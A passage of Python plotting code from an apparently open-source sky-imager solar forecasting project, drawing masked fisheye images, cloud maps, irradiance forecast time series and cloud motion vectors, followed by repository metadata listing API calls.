fig.subplots_adjust(hspace=0.1,wspace=0.2,left=0.01, right=0.99, top=0.99, bottom=0.05)\n plt.savefig(outfile,format=ini.outformat)\n plt.clf()\n\n\n\ndef plot_paper_juelich(outfile,in_img,actdate,nstations,pyr,csk,ini,cmv, \\\n xsun,ysun, mask,csl,\\\n cmap,features,hist_flag=False,text_flag=False,**params):\n\n plt.close('all')\n\n fig = plt.figure(1,figsize=(9,9),facecolor='w', edgecolor='k')\n\n if hist_flag:\n ncols = 3; nrows = 3\n else:\n ncols = 3; nrows = 3\n\n\n\n st = time.time()\n\n\n # get station index\n if not ini.cbh_flag and ini.fcst_flag:\n k = [j for j in range(0, nstations) if int(pyr[j].ind) == int(ini.statlist[0])][0]\n else:\n k = 0\n\n\n\n\n # Select area to cut from image\n imgsize = in_img.orig_color.shape\n x0 = int(ini.cy-ini.fx)\n if x0 < 0: x0 = 0\n x1 = int(ini.cy+ini.fx)\n if x1 > imgsize[0]: x1 = imgsize[0]\n y0 = int(ini.cx-ini.fy)\n if y0 < 0: x0 = 0\n y1 = int(ini.cx+ini.fy)\n if y1 > imgsize[1]: y1 = imgsize[1]\n\n\n\n\n # Origin Image\n plt.subplot2grid((nrows,ncols), (0,0))\n img = in_img.orig_color_draw.copy()\n img[mask] = 0\n img = cv2.cvtColor(img,cv2.COLOR_RGB2BGR)\n #img[xsun-15:xsun+15,ysun-15:ysun+15,:] = 0 # mark sun position\n img = img[x0:x1,y0:y1]\n img = rotate(img,-np.degrees(ini.rot_angles[2]))\n i1 = np.min(np.where(img!=0)[0])\n i2 = np.max(np.where(img!=0)[0])\n j1 = np.min(np.where(img!=0)[1])\n j2 = np.max(np.where(img!=0)[1])\n\n img = img[i1:i2,j1:j2]\n #img = np.float32(img)\n #img[img<=0]=np.nan\n\n plt.axis('off')\n plt.imshow(img)\n plt.title('Masked original image')\n del img\n\n\n\n plt.subplot2grid((nrows,ncols), (1,0))\n img = in_img.binary_color.copy()\n img = cv2.cvtColor(img,cv2.COLOR_BGR2RGB)\n img = img[x0:x1,y0:y1]\n img = rotate(img,-np.degrees(ini.rot_angles[2]))\n #img = np.float32(img)\n #img[img<=0]=np.nan\n i1 = np.min(np.where(img!=0)[0])\n i2 = np.max(np.where(img!=0)[0])\n j1 = np.min(np.where(img!=0)[1])\n j2 = np.max(np.where(img!=0)[1])\n img = img[i1:i2,j1:j2]\n plt.title('Cloud decision map')\n plt.axis('off')\n plt.imshow(img)\n\n\n\n\n\n\n ax = plt.subplot2grid((3,3), (0,1), colspan=2, rowspan=2)\n\n xvals = []; yvals = []; vals = []\n\n # Draw shadow map\n cm = plt.cm.get_cmap('jet')\n img = cv2.cvtColor(cmap,cv2.COLOR_RGB2GRAY) * 1.0\n img[cmap[:,:,2]==0] = np.nan\n img[cmap[:,:,2]==255] = 200\n img[(cmap[:,:,2]>1)&(cmap[:,:,2]<255)]=100\n\n for i in range(0, ini.fcst_horizon):\n\n x = int(pyr[k].fpos[i][1])\n y = int(pyr[k].fpos[i][0])\n if x > cmap.shape[0] - 2 or x <= 0 or y <= 0 or y > cmap.shape[1] - 2: continue\n xvals.append(x); yvals.append(y)\n vals.append(pyr[k].fghi[i])\n #if pyr[k].fghi[i] > 500:\n # cmap[x, y] = 200\n #else:\n # cmap[x, y] = 90\n ax1 = plt.scatter(xvals, yvals, s=30, vmin=0.15 * csk.actval, vmax=csk.actval + 0.15*csk.actval, marker='o', c=vals, cmap=cm, edgecolor='none')\n plot_stat(ax, ini, nstations, pyr, csk.ghi[csk.tind], k)\n arr = cv2.imread(ini.rootdir + '/config/arrow.png')\n if arr is not None:\n arr[arr==64]=255;arr[arr==68]=255;arr[arr==0]=255\n arr = cv2.cvtColor(arr, cv2.COLOR_RGB2GRAY)\n ofs = int(img.shape[0] / 150)\n arr = cv2.resize(arr,(arr.shape[0]/2,arr.shape[1]/2))\n img[ofs:ofs+arr.shape[0],ofs:ofs+arr.shape[1]] = arr\n # Title\n tit = 'Cloud base height: ' + str(params['cbh'])\n\n plt.title(tit, fontsize=12)\n ax.imshow(img,alpha=0.6,cmap=plt.cm.gray)\n\n\n # Rename ticks\n s = (ini.grid_size * ini.x_res) / 2.\n nticks = len(ax.get_xticks()) - 1\n steps = 2.*s / (nticks-1)\n new_ticks = list(map(int,np.arange(-s-steps,s+(2*steps),steps)))\n ax.xaxis.set_ticklabels(new_ticks,fontsize=10)\n ax.yaxis.set_ticklabels(new_ticks, fontsize=10)\n #ax.set_ylabel('latitudinal distance from camera [m]',fontsize=13)\n ax.set_xlabel('longitudinal distance from camera [m]',fontsize=13)\n\n\n # Draw timeseries\n ax = plt.subplot2grid((nrows,ncols), (2,0),colspan=3)\n\n maxval = 0\n\n i = 0\n\n # Forecast Values\n x = csk.time[csk.tind:csk.tind+ini.fcst_horizon]\n dates=[datetime.utcfromtimestamp(ts) for ts in x ]\n y = pyr[k].fghi[:]\n plt.plot_date(x=dates,y=y,fmt='r-',lw=2.0)\n\n if ini.radiation:\n\n # Analyses Values\n slc = slice(csk.tind-1800,csk.tind,ini.camera_res)\n x = csk.time[slc]\n dates=[datetime.utcfromtimestamp(ts) for ts in x ]\n y = pyr[k].aghi\n plt.plot_date(x=dates,y=y,fmt='gv')\n # Plot measurements\n x = pyr[k].time[ pyr[k].tind-1800:pyr[k].tind+ini.fcst_horizon]\n y = pyr[k].ghi[ pyr[k].tind-1800:pyr[k].tind+ini.fcst_horizon]\n y2 = pyr[k].dhi[ pyr[k].tind-1800:pyr[k].tind+ini.fcst_horizon]\n dates=[datetime.utcfromtimestamp(ts) for ts in x ]\n plt.plot_date(x=dates, y=y, fmt='b-',lw=2.0)\n if len(y2)>0:\n p = fill_between(dates,0,y2,alpha=0.5,linewidth=0,facecolor=\"yellow\")\n p = fill_between(dates,y2,y,alpha=0.5,linewidth=0,facecolor=\"orange\")\n\n # Clear sky irradiance\n x = csk.time[csk.tind-1800:csk.tind+ini.fcst_horizon]\n\n dates=[datetime.utcfromtimestamp(ts) for ts in x ]\n y = csk.ghi[csk.tind-1800:csk.tind+ini.fcst_horizon]\n plt.plot_date(x=dates,y=y,fmt='--',color='black')\n maxval = 1.5 * csk.actval\n\n plt.axvline(dates[1800], color='b', linestyle='--',lw=2.0)\n\n plt.xlabel('Time [UTC]',fontsize=14)\n plt.ylabel('Irradiance [W/m$^2$]',fontsize=14)\n if ini.radiation:\n plt.legend(['Forecast','Analysis','Measurement','Clear Sky'])\n else:\n plt.legend(['Forecast','Clear Sky'])\n\n plt.ylim([0,maxval])\n\n if ini.location == \"juelich\":\n plt.title('Station #' + str(pyr[k].ind) )\n ax.xaxis.set_major_formatter(DateFormatter('%H:%M:%S'))\n plt.grid('off')\n #ax.xaxis.set_major_locator(HourLocator())\n ax.xaxis_date()\n\n\n # Draw Text\n acttime = datetime.strftime(datetime.utcnow(),\"%Y-%m-%d %H:%M:%S\")\n plt.text(0.7,0.95,str(np.char.capitalize(ini.location)) + ' \\n' + \\\n actdate + str(' UTC'), weight=\"bold\")#, fontsize=22. )\n\n\n # Final settings\n fig.subplots_adjust(hspace=0.4,wspace=0.3,left=0.085, right=0.95, top=0.95, bottom=0.08)\n plt.draw()\n plt.savefig(outfile,dpi=200)\n plt.clf()\n\n\n\ndef plot_original_mod(img, outfile, mask, dt, ini, cam, title=\"Sky Imager\", **meta):\n\n from PIL import Image, ImageFont, ImageDraw\n from skysol.lib.drawings import draw_boundaries, sunpath\n\n data = img.orig_color_draw.copy()\n\n data = sunpath(data, dt, ini, cam)\n data[mask,:] = 0\n\n try:\n data = cv2.resize(data, img.segments.shape)\n data = np.array(255*draw_boundaries(data, img.segments), dtype=\"uint8\")\n data = rotate(data,-np.degrees(ini.rot_angles[2]))\n except:\n data = cv2.resize(data, (600,600))\n data = data[:,:,::-1]\n data = rotate(data,-np.degrees(ini.rot_angles[2]))\n\n i1 = np.min(np.where(data!=0)[0])\n i2 = np.max(np.where(data!=0)[0])\n j1 = np.min(np.where(data!=0)[1])\n j2 = np.max(np.where(data!=0)[1])\n data = data[i1:i2,j1:j2]\n #data = data[::-1,:,:]\n\n # PIL part\n im = Image.fromarray(data,'RGB')\n\n draw = ImageDraw.Draw(im)\n lx, ly = im.size\n\n datestr = datetime.strftime(img.locdate, \"%Y-%m-%d\")\n timestr = datetime.strftime(img.locdate, \"%H:%M:%S\")\n #txtfont = ImageFont.truetype(\"data/arial.ttf\", 22)\n draw.text((10,10), title,fill='red')\n\n #txtfont = ImageFont.truetype(\"data/arial.ttf\", 20)\n draw.text((lx-120,10), datestr,fill='red', align=\"right\")\n draw.text((lx-120,30), timestr, fill = 'red', align=\"right\")\n\n #txtfont = ImageFont.truetype(\"data/arial.ttf\", 18)\n draw.text((10,ly-60), \"Sun Elev. = %.1f°\" % (90-meta['sza']), fill = 'red', align=\"right\")\n draw.text((10,ly-40), \"Sun Azimuth = %.1f°\" % meta['saz'], fill = 'red', align=\"right\")\n draw.text((10,ly-20), \"Cloud Cover = %.1f%%\" % meta['cc'], fill = 'red', align=\"right\")\n\n if meta['img_qc']:\n qf = \"OK\"\n else:\n qf = \"BAD\"\n\n draw.text((lx-100,ly-60), \"QC = %s\" % qf, fill = 'red', align=\"right\")\n CC_long = ['Cumulus','Cirrus','Altocumulus','Clear Sky','Stratocumulus', 'Stratus', 'Nimbostratus']\n CC_short = ['Cu','Ci/Cs','Ac/Cc','Clear','Sc', 'St', 'Ns/Cb']\n ccstr_long = CC_long[meta['imgclass']-1]\n ccstr_short = CC_short[meta['imgclass']-1]\n if meta['imgclass'] > 0:\n cpstr = str(np.round(meta['imgprob'][meta['imgclass']-1],2))\n else:\n cpstr = \"-1\"\n draw.text((lx-120,ly-40), \"%s (%s%%)\" % (ccstr_short, cpstr), fill = 'red', align=\"right\")\n\n im.save(outfile)\n\n\n\n\ndef plot_cmv(outfile, in_img, ini, cam, cmv,\n xsun, ysun, mask, map_x, map_y, **params):\n \"\"\"\n Time for example: 2013-04-25 14:15:30\n\n Shi-Tomasi Corner Detection parameter:\n self.feature_params = dict( minDistance = 50,\n blockSize = 12)\n self.maxCorners = 500\n self.qualityLevel = 0.03\n \"\"\"\n\n plt.close('all')\n\n # Figure size\n fig = plt.figure(1,figsize=(8,8),facecolor='w', edgecolor='k')\n\n # Image Subplot order\n nrows = 2; ncols = 2\n\n # Original Image\n ax = plt.subplot2grid((nrows,ncols), (0,0))\n img = in_img.orig_color_draw.copy()\n img[cmv.cmv_mask,:] = [0,0,255]\n img[mask] = 0\n img = cv2.cvtColor(img,cv2.COLOR_RGB2BGR)\n #img = img[x0:x1,y0:y1]\n cv2.circle(img,(ysun,xsun),20,[250,200,25],-1)\n #img = rotate(img,-np.degrees(ini.rot_angles[2]))\n i1 = np.min(np.where(img!=0)[0])\n i2 = np.max(np.where(img!=0)[0])\n j1 = np.min(np.where(img!=0)[1])\n j2 = np.max(np.where(img!=0)[1])\n img = img[i1:i2,j1:j2]\n plt.axis('off')\n plt.imshow(img)\n del img\n ax.text(0.03,0.95,'Fisheye RGB Image',color=\"white\",fontweight=\"bold\",fontsize=12,transform=ax.transAxes)\n\n\n # Segmented cloud/sky image with CMV\n ax = plt.subplot2grid((nrows,ncols), (0,1))\n img = in_img.orig_gray.copy()\n img = cv2.cvtColor(img,cv2.COLOR_GRAY2BGR)\n img[cmv.cmv_mask,:] = [255,0,0]\n # Draw every 50th cloud path\n if len(cmv.x) > 0: drawings.cloud_path(img, cmv.x, cmv.y, lcolor=[25,25,125])\n img[mask] = 0\n img[in_img.mask_horizon] = 0\n cv2.circle(img,(ysun,xsun),20,[250,200,25],-1)\n #img = rotate(img,-np.degrees(ini.rot_angles[2]))\n img = img[i1:i2,j1:j2]\n plt.axis('off')\n plt.imshow(img, cmap=plt.cm.viridis)\n ax.text(0.03,0.95,'Fisheye Intensity',color=\"white\",fontweight=\"bold\",fontsize=12,transform=ax.transAxes)\n\n del img\n\n # Projected RGB with CMV\n ax = plt.subplot2grid((nrows,ncols), (1,0))\n img = in_img.orig_color_draw.copy()\n img[cmv.cmv_mask,:] = [0,0,255]\n img = cam.grid(img, map_x, map_y)\n img = cv2.cvtColor(img,cv2.COLOR_RGB2BGR)\n plt.axis('off')\n plt.imshow(img)\n ax.text(0.03,0.95,'Perspective projection RGB',color=\"white\",fontweight=\"bold\",fontsize=12,transform=ax.transAxes)\n\n # Projected binary with CMV\n ax = plt.subplot2grid((nrows,ncols), (1,1))\n img = in_img.binary_color\n img[cmv.cmv_mask,:] = [0,0,255]\n if len(cmv.x) > 0: drawings.cloud_path(img, cmv.x, cmv.y, lcolor=[25,25,125])\n img = cam.grid(img, map_x, map_y)\n img = cv2.cvtColor(img,cv2.COLOR_RGB2BGR)\n plt.axis('off')\n plt.imshow(img)\n ax.text(0.03,0.95,'Perspective projection cloud map',color=\"white\",\n fontweight=\"bold\",fontsize=12,transform=ax.transAxes)\n\n fig.text(0.5,0.5, \"#CMV %d - Direction %.1f° - Speed %.1f\" % (np.sum(cmv.flag),np.degrees(cmv.mean_direction), \\\n cmv.mean_speed), fontsize=15, horizontalalignment='center')\n\n\n # Final settings\n plt.tight_layout()#pad=0.5, w_pad=0.5, h_pad=0.5)\n plt.subplots_adjust(left=0.01, right=0.99, top=0.99, bottom=0.01)\n plt.draw()\n plt.savefig(outfile,dpi=100)\n plt.clf()\n plt.close('all')\n", "repo_name": "fcco/SkySol", "sub_path": "skysol/lib/visualization.py", "file_name": "visualization.py", "file_ext": "py", "file_size_in_byte": 38371, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "matplotlib.pyplot.rcParams", "line_number": 21, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 22, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 23, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 24, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 25, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 25, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 26, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 27, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 28, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 29, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 30, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 31, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 32, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 33, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 34, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 35, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 36, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 37, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 38, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 39, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 40, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 41, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rc", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}, {"api_name": "cartopy.io.img_tiles.GoogleTiles", "line_number": 51, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path", "line_number": 55, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 57, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 57, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 73, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.Rectangle", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 75, "usage_type": "name"}, {"api_name": "utm.latlon_to_zone_number", "line_number": 91, "usage_type": "call"}, {"api_name": "cartopy.crs.UTM", "line_number": 96, "usage_type": "call"}, {"api_name": "cartopy.crs", "line_number": 96, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "numpy.round", "line_number": 138, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 161, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 161, "usage_type": "name"}, {"api_name": "cartopy.mpl.gridliner.LONGITUDE_FORMATTER", "line_number": 181, "usage_type": "name"}, {"api_name": "cartopy.mpl.gridliner.LATITUDE_FORMATTER", "line_number": 182, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 187, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 187, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 201, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 201, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm.get_cmap", "line_number": 202, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 202, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 202, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 204, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 204, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 205, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 205, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm.get_cmap", "line_number": 213, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 213, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 213, "usage_type": "name"}, {"api_name": "cmocean.cm", "line_number": 214, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 227, "usage_type": "call"}, {"api_name": "numpy.isfinite", "line_number": 227, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 228, "usage_type": "call"}, {"api_name": "numpy.isfinite", "line_number": 228, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 229, "usage_type": "call"}, {"api_name": "numpy.isfinite", "line_number": 229, "usage_type": "call"}, {"api_name": "skysol.lib.misc.grid2latlon", "line_number": 230, "usage_type": "call"}, {"api_name": "skysol.lib.misc", "line_number": 230, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 246, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 246, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 263, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 263, "usage_type": "name"}, {"api_name": "cv2.cvtColor", "line_number": 265, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2BGR", "line_number": 265, "usage_type": "attribute"}, {"api_name": "cv2.circle", "line_number": 267, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 269, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 269, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 270, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 270, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 271, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 271, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 275, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 275, "usage_type": "name"}, {"api_name": "numpy.nan", "line_number": 277, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 279, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 279, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 280, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 280, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 281, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 281, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 282, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 282, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 283, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 283, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 284, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 284, "usage_type": "name"}, {"api_name": "numpy.nan", "line_number": 290, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 291, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 291, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 292, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 292, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 294, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 294, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axvline", "line_number": 295, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 295, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 296, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 296, "usage_type": "name"}, {"api_name": "numpy.divide", "line_number": 300, "usage_type": "call"}, {"api_name": "numpy.isfinite", "line_number": 301, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 303, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 303, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 304, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 304, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axvline", "line_number": 305, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 305, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axvline", "line_number": 306, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 306, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 307, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 307, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 312, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 312, "usage_type": "name"}, {"api_name": "numpy.nan", "line_number": 314, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 316, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 316, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 316, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.title", "line_number": 317, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 317, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 318, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 318, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 319, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 319, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 342, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 342, "usage_type": "name"}, {"api_name": "cv2.cvtColor", "line_number": 344, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 344, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.title", "line_number": 348, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 348, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 349, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 349, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 350, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 350, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 359, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 359, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 361, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 361, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 363, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 363, "usage_type": "name"}, {"api_name": "datetime.datetime.utcfromtimestamp", "line_number": 382, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 382, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 383, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 383, "usage_type": "name"}, {"api_name": "datetime.datetime.utcfromtimestamp", "line_number": 391, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 391, "usage_type": "name"}, {"api_name": "numpy.isnan", "line_number": 391, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 394, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 394, "usage_type": "name"}, {"api_name": "datetime.datetime.utcfromtimestamp", "line_number": 399, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 399, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 401, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 401, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 403, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 403, "usage_type": "name"}, {"api_name": "datetime.datetime.utcfromtimestamp", "line_number": 407, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 407, "usage_type": "name"}, {"api_name": "numpy.isnan", "line_number": 407, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 410, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 410, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axvline", "line_number": 413, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 413, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 414, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 414, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 415, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 415, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 416, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 416, "usage_type": "name"}, {"api_name": "matplotlib.dates.DateFormatter", "line_number": 418, "usage_type": "call"}, {"api_name": "matplotlib.ticker.LinearLocator", "line_number": 419, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 423, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 423, "usage_type": "name"}, {"api_name": "datetime.datetime.strftime", "line_number": 425, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 425, "usage_type": "name"}, {"api_name": "datetime.datetime.utcnow", "line_number": 425, "usage_type": "call"}, {"api_name": "datetime.datetime.strftime", "line_number": 426, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 426, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 449, "usage_type": "call"}, {"api_name": "numpy.degrees", "line_number": 453, "usage_type": "call"}, {"api_name": "numpy.degrees", "line_number": 457, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 472, 